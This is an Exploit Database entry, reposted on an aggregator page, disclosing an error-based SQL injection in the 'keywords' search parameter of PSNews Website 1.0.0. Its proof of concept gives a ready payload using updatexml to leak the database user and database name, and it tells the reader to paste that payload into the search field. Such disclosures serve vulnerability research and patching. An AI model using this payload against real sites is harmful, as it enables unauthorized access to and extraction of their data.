PSNews Website 1.0.0 – ‘Keywords’ SQL Injection

• Exploit Database
• 19 阅读

• 作者： L0RD
  日期： 2018-02-16
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/44140/

• # Exploit Title:PSNews Website (Same Backend with Mobile Apps) 1.0.0 - 'Keywords' SQL Injection
  # Dork: N/A
  # Date: 2018-02-16
  # Exploit Author: Borna nematzadeh (L0RD) or borna.nematzadeh123@gmail.com
  # Vendor Homepage: https://codecanyon.net/item/psnews-website/21360354?s_rank=9
  # Version: 1.0.0
  # Category: Webapps
  # CVE: N/A
  # # # # #
  # Description:
  # The vulnerability allows an attacker to inject sql commands.
  # # # # #
  # Proof of Concept :
  
  SQLI :
  
  http://server/index.php/search
  
  # Parameter : keywords (POST)
  #Type: Error based
  #Title:Mysql >= 5.6.33 AND Error based - updatexml (XPATH query)
  #Payload : ' or updatexml(1, concat(0x3a,user(),0x3a,database()),1)
  #######################################
  # Discrption : Put this payload in the search field.then you will have
  XPATH syntax error in the next page.
  
  Test : http://server/index.php/search
  Payload : ' or updatexml(1, concat(0x3a,user(),0x3a,database()),1)